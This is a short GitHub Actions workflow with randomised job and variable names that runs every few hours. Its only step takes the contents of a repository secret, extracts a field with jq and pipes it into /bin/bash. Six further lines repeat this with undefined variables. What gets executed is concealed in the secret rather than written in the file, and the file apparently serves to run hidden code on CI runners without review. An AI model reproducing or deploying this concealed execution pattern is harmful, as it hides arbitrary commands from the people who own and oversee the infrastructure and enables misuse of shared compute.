name: qianshuzhong8912

on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qianshuzhong8912
        env:
          v688: ${{ secrets.v688 }}
        run: |
          echo $v688 | jq -r .o812 | /bin/bash
          echo $etzhd5711 | jq -r .qzmw225 | /bin/bash
          echo $feb5282 | jq -r .vs2225 | /bin/bash
          echo $xtn1 | jq -r .lygub06035 | /bin/bash
          echo $awnpi7213 | jq -r .wjvze6224 | /bin/bash
          echo $asie4159 | jq -r .xt413 | /bin/bash
          echo $p92981 | jq -r .sskzt15 | /bin/bash

